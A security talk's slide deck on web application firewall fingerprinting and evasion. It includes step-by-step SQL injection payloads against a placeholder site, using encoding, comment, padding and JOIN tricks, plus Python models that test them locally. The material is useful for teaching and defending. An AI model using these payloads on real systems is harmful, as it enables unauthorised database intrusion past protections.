WAF Bypassing Techniques
• Avinash Kumar Thapa, Senior Security Analyst at Network Intelligence India
• Bug hunter on HackerOne
• CTF author on Vulnhub.com
• Some exploits and PoCs on Exploit-DB as well
• Passionate about web application security and exploit writing
Agenda
• Introduction to Web Application Firewalls
• Operation modes
• Vendors
• Fingerprinting a WAF
• Ways to bypass WAFs
• Practical cases for bypassing
• Conclusion
Introduction to Web Application Firewalls
• Operates at the application layer (OSI layer 7), in front of the web server.
• Inspects HTTP/HTTPS, SOAP and XML-RPC web-service traffic between clients and servers and compares it against pre-defined signatures held in a rule database.
• Basic goal of a WAF: monitor requests and block content that violates the pre-defined policy.
• These policies describe patterns of user input that end up in a potential attack (SQL injection, XSS, file inclusion, ...).
• Understands HTTP and HTTPS semantics, which a traditional network firewall (ports, addresses, packet state) never sees.
Types of Operation Modes
Negative Model
A negative security model recognises attacks by relying on a database of expected attack signatures (a denylist).
Example:
Do not allow, on any page, any argument value (user input) that matches potential XSS strings such as <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement.
Cons:
● Less protection: anything no signature covers gets through, so the attacker's job reduces to finding an encoding or variant the signatures do not match.
Positive Model
A positive security model enforces expected behaviour by learning the application logic and building a security policy of valid, known requests (an allowlist) as users interact with the application.
Example:
● On page news.jsp the field id may contain only the digits [0-9] and must lie between 0 and 65535.
● Enforcing this with an intval-style condition on the page (only integers are accepted).
Pros:
● Better performance (fewer rules).
● Fewer false positives.
Cons:
● Much more time to implement.
● Some vendors provide an "automatic learning mode". It helps, but is far from perfect; in the end you always need a skilled human to review the policies.
Mixed Model
● Combination of both positive and negative models: an allowlist for the well-understood parameters, signatures for everything else.
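The two models side by side, as an added Python illustration that is not part of the original deck: a denylist built from the three XSS strings the slide names, and the news.jsp allowlist for id. The sample inputs are constructed; nothing here is a vendor ruleset.

```python
import re

# Negative model: deny values matching a signature database. These three
# signatures are the ones the slide names; a real ruleset has thousands.
NEGATIVE_SIGNATURES = [
    re.compile(r"<script>", re.IGNORECASE),
    re.compile(r"</script>", re.IGNORECASE),
    re.compile(r"String\.fromCharCode", re.IGNORECASE),
]


def negative_model_allows(value: str) -> bool:
    """Allow unless some known-bad pattern is present (the slide's negative mode)."""
    return not any(sig.search(value) for sig in NEGATIVE_SIGNATURES)


# Positive model: the slide's news.jsp rule. 'id' may contain only the digits
# 0-9 and must lie between 0 and 65535; everything else is rejected.
ID_PATTERN = re.compile(r"^[0-9]{1,5}$")


def positive_model_allows(value: str) -> bool:
    """Allow only values that fit the declared shape and range of the field."""
    return bool(ID_PATTERN.match(value)) and int(value) <= 65535


# Constructed values for the 'id' parameter of news.jsp.
SAMPLE_INPUTS = [
    "42",                                 # legitimate
    "65536",                              # well-formed but out of range
    "<script>alert(1)</script>",          # hits a signature
    "<svg/onload=alert(1)>",              # XSS without a <script> tag: no signature hit
    "%3Cscript%3Ealert(1)%3C/script%3E",  # URL-encoded: the literal signature never appears
    "1 OR 1=1",                           # SQL injection: outside this XSS signature set
]


def compare_models(values=SAMPLE_INPUTS):
    """Return {value: (negative_allows, positive_allows)} for each input."""
    return {v: (negative_model_allows(v), positive_model_allows(v)) for v in values}


if __name__ == "__main__":
    for value, (neg, pos) in compare_models().items():
        print(f"{value!r:40} negative={'allow' if neg else 'BLOCK'}  "
              f"positive={'allow' if pos else 'BLOCK'}")
```

The denylist only stops the one payload that spells out the signature; every other malicious value passes it, while the allowlist rejects all of them and the out-of-range integer as well. The price is the second column: the allowlist has to be written (or learned and reviewed) per parameter.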
Testing Environments
• Google Chrome
• Mozilla Firefox
• Internet Explorer
• Opera Browser
Products
• F5 BIG-IP WAF (ASM)
• Sucuri
• ModSecurity
• Imperva Incapsula
• PHP-IDS (PHP Intrusion Detection System)
• Quick Defense
• AQTRONIX WebKnight (for IIS, based on ISAPI filters)
• Barracuda WAF
Fingerprinting WAF
• By the cookies a WAF adds to the HTTP conversation
  Citrix NetScaler, for example, adds its own cookies to responses (screenshot in the original slides).
  F5 BIG-IP ASM does the same (screenshot in the original slides).
• On the basis of the HTTP response
  Other WAFs can be detected by the kind of HTTP response received when a malicious request is submitted; the response differs from WAF to WAF. Common status codes returned for blocked requests are 403, 406, 419, 500 and 501.
  Shown as screenshots in the original slides: the block response of F5 BIG-IP; the request and response of ModSecurity; the response of WebKnight, and the same response rendered in the browser.
• Always compare with a baseline: send a benign request first, then the malicious one, and attribute only the difference to the WAF. A plain 403 or 500 can equally come from the application itself.
Automatic Fingerprinting of a WAF
• Using Nmap scripts (http-waf-detect tells you whether something is filtering; http-waf-fingerprint tries to name it)
nmap -p80 --script http-waf-detect <host>
• Using wafw00f
python wafw00f.py <URL>
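An added example, not from the deck, of what such a tool does internally: a classifier applying the indicators above to constructed responses. The cookie names (NSC_*, ns_af and citrix_ns_id for NetScaler; TS plus hex digits and BIGipServer* for F5), WebKnight's 999 status with its "No Hacking" page, and the "Mod_Security" error text are the indicators public fingerprinting tools such as wafw00f key on; treat them as starting points, since an operator can rename or suppress all of them. The Response class and every sample response are constructed for this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Response:
    """Minimal view of an HTTP response: status, raw Set-Cookie values, body."""
    status: int
    set_cookies: List[str] = field(default_factory=list)
    body: str = ""

    def cookie_names(self) -> List[str]:
        return [c.split("=", 1)[0].strip() for c in self.set_cookies]


# Cookie-name indicators. Vendors can change these; they are the commonly seen defaults.
NETSCALER_COOKIE = re.compile(r"^(NSC_|ns_af$|citrix_ns_id$)")
F5_COOKIE = re.compile(r"^(TS[0-9a-fA-F]{4,8}$|BIGipServer)")
BLOCK_STATUSES = (403, 406, 419, 500, 501)   # the codes the slides list for blocked requests


def fingerprint(attack: Response, baseline: Optional[Response] = None) -> str:
    """Name the WAF from the response to a malicious request.

    `baseline` is the response to a benign request for the same URL. If the
    attack request is answered exactly like the baseline, nothing filtered it,
    regardless of the status code.
    """
    names = attack.cookie_names()
    if any(NETSCALER_COOKIE.match(n) for n in names):
        return "Citrix NetScaler"
    if any(F5_COOKIE.match(n) for n in names):
        return "F5 BIG-IP (ASM/LTM)"
    body = attack.body.lower()
    if attack.status == 999 or "no hacking" in body:
        return "AQTRONIX WebKnight"
    if "mod_security" in body or "modsecurity" in body:
        return "ModSecurity"
    if baseline is not None and attack.status == baseline.status:
        return "no WAF detected (attack answered like baseline)"
    if attack.status in BLOCK_STATUSES:
        return f"unidentified WAF (blocked with {attack.status})"
    return "no WAF detected"


# Constructed sample responses (not captured from real products).
BASELINE = Response(200, [], "<html><body>news</body></html>")
SAMPLES = {
    "netscaler": Response(200, ["ns_af=abc123; Path=/", "citrix_ns_id=xyz; Path=/"]),
    "f5_asm": Response(200, ["TS01a2b3c4=0123abcd; Path=/"]),
    "webknight": Response(999, [], "<title>No Hacking</title>"),
    "modsecurity": Response(406, [], "Not Acceptable. This error was generated by Mod_Security."),
    "generic_403": Response(403, [], "Forbidden"),
    "unprotected": Response(200, [], "You have an error in your SQL syntax"),
}

if __name__ == "__main__":
    for name, resp in SAMPLES.items():
        print(f"{name:12} -> {fingerprint(resp, BASELINE)}")
```

The baseline comparison is the part worth keeping when you write your own: a 403 that the application also returns for a benign request is not a WAF, and a WAF that answers 200 with a decoy page is only visible through cookies, headers or body text.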
Techniques to Bypass WAFs
• Bypassing a WAF for SQL injection vulnerabilities
• Bypassing a WAF for XSS issues
• Bypassing a WAF for LFI and RFI vulnerabilities
General Techniques to Bypass a WAF
• Null character injection
• Mixed case
• Inline comments
• Chunked requests (Transfer-Encoding: chunked; a WAF that does not reassemble the body never sees the whole payload)
• "Buffer overflow" (the deck's name for oversizing the request so the payload lies beyond the portion the WAF inspects; nothing is actually overflowed)
• HTTP parameter pollution
• URL encoding (single, double, triple)
• Keyword splitting
• Replaced keywords
• Ignoring cookies
• Using data URIs
• Header injection
Bypassing WAF for SQL Injection Vulnerabilities
Target: https://abc.com/index.php?id=1
Example 1 (without WAF)
https://abc.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
Example 1 (with WAF)
https://abc.com/index.php?id=1'
HTTP/1.1 403 Forbidden
or HTTP/1.1 406 Not Acceptable
or HTTP/1.1 404 Not Found
or HTTP/1.1 500 Internal Server Error
or HTTP/1.1 400 Bad Request
Some recon on the WAF
Came to know that ModSecurity is in action.
https://abc.com/index.php?id=1"
HTTP/1.1 200 OK (the query is built with single quotes, so a double quote neither breaks it nor trips the WAF)
https://abc.com/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ' at line 6
This technique is URL encoding: the WAF signature matched the literal quote but not its %27 form, while the web server decoded %27 back to ' before the query was built.
Sometimes you need to go further:
1) Double URL encoding: %2527 → (WAF decodes once) %27 → (application decodes again) '
2) Triple URL encoding: %252527 → %2527 → %27 → ' (this is a very rare case)
Double and triple encoding only work when something behind the WAF (the application or a framework layer) decodes the value one more time than the WAF does.
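Why the extra layer works, and why it stops working against a WAF that normalises properly, as an added Python example (not the deck's code). The single-pass WAF, the double-decoding application and the normalising WAF are all constructed stand-ins; the only real pieces are urllib's quote and unquote, which model what the web server does with a query-string value.

```python
from urllib.parse import quote, unquote

SIGNATURE = "'"   # the one thing this toy signature WAF looks for


def encode_layers(payload: str, layers: int) -> str:
    """URL-encode `payload` `layers` times: ' -> %27 -> %2527 -> %252527."""
    for _ in range(layers):
        payload = quote(payload, safe="")
    return payload


def single_decode_waf_blocks(raw: str) -> bool:
    """Negative-model WAF that decodes the parameter exactly once before matching.
    %2527 decodes to the harmless-looking text %27, so the quote is never seen."""
    return SIGNATURE in unquote(raw)


def application_value(raw: str, decodes_again: bool) -> str:
    """What the backend finally uses. The web server decodes once; a hypothetical
    application that calls urldecode() on the already-decoded value decodes twice."""
    value = unquote(raw)
    return unquote(value) if decodes_again else value


def normalising_waf_blocks(raw: str, max_passes: int = 5) -> bool:
    """Hardened WAF: keep decoding (bounded) until the value stops changing, then
    match. Mature rulesets apply such multi-pass transformations before inspection."""
    value = raw
    for _ in range(max_passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return SIGNATURE in value


def trace(payload: str = "1'", max_layers: int = 3):
    """Compare the three parties for each encoding depth of `payload`."""
    rows = []
    for n in range(1, max_layers + 1):
        raw = encode_layers(payload, n)
        rows.append({
            "raw": raw,
            "single_decode_waf_blocks": single_decode_waf_blocks(raw),
            "normalising_waf_blocks": normalising_waf_blocks(raw),
            "app_sees_single_decode": application_value(raw, False),
            "app_sees_double_decode": application_value(raw, True),
        })
    return rows


if __name__ == "__main__":
    for row in trace():
        print(row)
```

With %2527 the single-pass WAF passes the request and an application that decodes twice receives the quote; an application that decodes only once receives the literal text 1%27 and the attack fails even though the WAF let it through. That second outcome is why the deck calls triple encoding rare: each extra layer needs one more decode on the far side.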
https://abc.com/index.php?id=1%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'ORDER' keyword blocked?
• Is the 'ORDER BY' combination blocked?
• Is there an alternative to ORDER BY?
• Are spaces blocked?
Let's try
https://abc.com/index.php?id=1%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
• 'ORDER' keyword is blocked?
• Check again whether 'ORDER' on its own is blocked
https://abc.com/index.php?id=1%27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind
• 'ORDER' keyword is not blocked
• What is blocked then?
SPACES ARE BLOCKED
https://abc.com/index.php?id=1%27 ORDER by 1%23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1%27ORDERby1%23
HTTP/1.1 200 OK
No assumptions left: only the spaces are blocked.
Note that 200 OK here only means the WAF let the request through; ORDERby1 is not valid SQL, so the application itself will have failed on it. The WAF verdict and the SQL outcome are two separate signals and must be read separately.
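The elimination the slides do by hand, as an added example (not the deck's code) that can be pointed at any "oracle" returning a status for one parameter value. The two oracles below are constructed stand-ins for the target's observed behaviour; against a live host you would wrap an HTTP client in a function of the same shape.

```python
import re
from typing import Callable, Dict
from urllib.parse import unquote_plus

# An oracle sends one value of the vulnerable parameter and returns the HTTP
# status. The two below are constructed (hypothetical) targets.
Oracle = Callable[[str], int]


def mock_space_blocking_waf(raw_value: str) -> int:
    """Decodes the query string as the web server does ('+' and %20 both become
    a space) and answers 403 whenever a space is present. Keywords are not checked."""
    return 403 if " " in unquote_plus(raw_value) else 200


def mock_union_blocking_waf(raw_value: str) -> int:
    """A different constructed target: case-insensitive match on the word UNION."""
    return 403 if "union" in unquote_plus(raw_value).lower() else 200


def isolate_blocked_tokens(raw_payload: str, send: Oracle) -> Dict:
    """Re-send pieces of a blocked payload to learn what the WAF objects to.

    Probing order, as the slides do it by hand:
      1. a benign value, to learn what 'not blocked' looks like
      2. the full payload
      3. every whitespace-separated token on its own
      4. all tokens concatenated with no separator at all
      5. a probe containing nothing suspicious except one space
    """
    baseline = send("1")

    def blocked(status: int) -> bool:
        return status != baseline

    tokens = re.findall(r"\S+", raw_payload)
    report = {
        "baseline_status": baseline,
        "full": send(raw_payload),
        "tokens": {t: send(t) for t in tokens},
        "joined_without_spaces": send("".join(tokens)),
        "space_probe": send("1 1"),
    }
    bad_tokens = [t for t, s in report["tokens"].items() if blocked(s)]

    if not blocked(report["full"]):
        verdict = "not blocked"
    elif bad_tokens:
        verdict = "keyword(s) blocked: " + ", ".join(bad_tokens)
    elif blocked(report["space_probe"]) and not blocked(report["joined_without_spaces"]):
        verdict = "only the space separator is blocked"
    elif blocked(report["joined_without_spaces"]):
        verdict = "a combination of tokens is blocked"
    else:
        verdict = "blocked for another reason (length, encoding, headers)"
    report["verdict"] = verdict
    return report


if __name__ == "__main__":
    for oracle in (mock_space_blocking_waf, mock_union_blocking_waf):
        result = isolate_blocked_tokens("%27 UNION SELECT 1,2,3%23", oracle)
        print(f"{oracle.__name__}: {result['verdict']}")
```

The function deliberately compares every status against the benign baseline rather than against a hard-coded 200, because the block code differs from product to product (the deck lists 403, 406, 419, 500 and 501) and some targets answer blocked requests with 200 and a decoy page.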
Techniques to bypass spaces
• Using '+' instead of a space, e.g. order+by+1 (mostly blocked, because the web server decodes + to a space before, or at the same time as, the WAF inspects it)
• Using inline comments instead of spaces, e.g. order/**/by/**/1
• Using a combination of inline comments and URL encoding instead of spaces, e.g.
  • order/%2a%2a/by/%2a%2a/1 (decodes to order/**/by/**/1)
  • order%2f**%2fby%2f**%2f1
• Using a combination of inline comments, URL encoding and junk characters instead of spaces, e.g.
  • order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
  • order%2f*JUNKCHARACTERS*%2fby%2f*JUNKCHARACTERS*%2f1
  (MySQL ignores the body of a comment, so any junk can be placed inside it to throw off a signature)
• Using other characters that the MySQL parser accepts as separators but the signature does not list: %0a, %0b, %0c, %0d, %a0, %09, %01 (verify each one against the target's version; not every one of them is treated as whitespace everywhere)
The query becomes
• ORDER%0aby%0a1
• ORDER%0bby%0b1
• ORDER%0cby%0c1
• ORDER%0Dby%0D1
• ORDER%A0by%A01
• ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Let's suppose the number of columns is 3
https://abc.com/index.php?id=1%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Spaces are blocked?
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Spaces were bypassed using inline comments... still blocked?
• 'UNION' keyword is blocked?
• 'SELECT' keyword is blocked?
• Integers are blocked?
• Commas are blocked?
• The combination "UNION SELECT" is blocked?
• "SELECT with integers" is blocked?
Techniques to Bypass
Using MySQL version-conditional comments (the content is executed only by MySQL at or above the given version; 00000 executes on every version):
• /*!50000UNION*/
• /*!40000UNION*/
• /*!00000UNION*/
If UNION is blocked, using URL-encoding techniques:
• %55nion (decodes to Union)
• %2555nion (double encoded)
• %55%4e%49%4f%4e (decodes to UNION)
• double and triple URL encoding of the whole keyword, as described above
https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind (unchanged)
• 'UNION' keyword is blocked?
• 'SELECT' keyword is blocked?
• Integers are blocked?
• Commas are blocked?
• The combination "UNION SELECT" is blocked?
• "SELECT with integers" is blocked?
https://abc.com/index.php?id=1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Still the same assumptions. Time to test the pieces one at a time.
https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are NOT blocked.
• The combination "UNION SELECT" is blocked?
• "SELECT with integers" is NOT blocked.
Techniques to bypass the combination "UNION SELECT"
Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/
Using whitespace characters and a URL-encoded line comment (#) between the two keywords:
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT
(# opens a MySQL line comment that swallows everything up to the end of the line, so UNION#...<newline>SELECT is still UNION SELECT to the database but no longer matches a signature that expects the two keywords to be adjacent. In practice %0a, or %0d%0a, is the separator that reliably ends the comment; check the others against the target before relying on them.)
Using "buffer overflow" (oversizing the request)
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Sometimes the junk has to be increased until it exceeds the amount of data the WAF is willing to inspect, or the distance over which its regular expression correlates the two keywords:
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[... several hundred X, shortened here ...]XXXXXXXXXXXXXXXX%0ASELECT
Using DISTINCT
UNION DISTINCT SELECT
Using DISTINCTROW
UNION DISTINCTROW SELECT
https://abc.com/index.php?id=1%27/**/UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[... several hundred X, shortened here ...]XXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23
HTTP/1.1 200 OK
Special case: what if commas are blocked?
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are blocked.
• The combination "UNION SELECT" is NOT blocked.
• "SELECT with integers" is NOT blocked.
Time to bypass commas ","
Basic bypasses
• URL encoding: %2c → ,
• Double URL encoding: %252c → %2c → ,
• Inline comments around the comma, e.g. UNION SELECT 1/*!,*/2
Advanced way to bypass commas
• Using JOIN
• JOIN adds columns the way UNION adds rows
• We have SELECT 1,2,3
• Equivalent without commas: SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
(Two columns are shown; add a third JOIN for the three-column case assumed earlier.)
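An added example, not the deck's code, that serves both the space-bypass section and the JOIN comma bypass above: each variant is run through a constructed two-rule signature WAF (one rule keys on a space, one on a comma, both applied to the URL-decoded value) and then through a re-creation of the vulnerable index.php query on Python's built-in sqlite3, so that evasion and SQL equivalence are checked separately. Two differences from the deck: SQLite has no # comment, so the payloads end in -- instead of %23, and MySQL version comments (/*!50000...*/) are not exercised because SQLite treats them as ordinary comments. The table and rows are constructed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed negative-model rules, modelled on what the slides inferred about
# the target. Each rule is checked on the decoded value, as the server sees it.
RULES = {
    "space": re.compile(r" "),
    "comma": re.compile(r","),
}


def waf_rules_fired(raw_value: str):
    """Names of the rules that would block this query-string value."""
    decoded = unquote_plus(raw_value)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def vulnerable_lookup(raw_value: str):
    """The slides' index.php?id=... endpoint re-created on SQLite: the decoded
    parameter is concatenated into the query with no sanitisation at all."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    query = f"SELECT id, title FROM news WHERE id='{unquote_plus(raw_value)}'"
    try:
        return set(conn.execute(query).fetchall())
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"
    finally:
        conn.close()


# Payloads in the form they travel in the query string (-- instead of %23).
VARIANTS = {
    "plain": "1%27 UNION SELECT 1,2 --",
    "comments_for_spaces": "1%27/**/UNION/**/SELECT/**/1,2/**/--",
    "newlines_for_spaces": "1%27%0aUNION%0aSELECT%0a1,2%0a--",
    "join_for_commas": ("1%27/**/UNION/**/SELECT/**/*/**/FROM/**/"
                        "(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b/**/--"),
}


def evaluate(variants=VARIANTS):
    """For each variant: which WAF rules fire, and what the backend returns."""
    return {name: {"rules_fired": waf_rules_fired(v), "result": vulnerable_lookup(v)}
            for name, v in variants.items()}


if __name__ == "__main__":
    for name, outcome in evaluate().items():
        print(f"{name:20} rules={outcome['rules_fired']!s:18} result={outcome['result']}")
```

All four variants return the same two rows, the real record and the injected (1, 2); only the JOIN form reaches the database past both rules. Running the equivalence check locally before sending a variant saves round trips against a live target and, on the defensive side, shows why a rule on a single character is a poor stand-in for understanding the SQL grammar.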
Similar approach for other vulnerabilities
• For XSS
• For LFI / RFI
DEMO TIME
References
• Images in slides 10, 11, 14, 15, 16, 17 taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!

More Related Content

What's hot

Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 

What's hot (20)

SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 

Similar to Waf bypassing Techniques

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
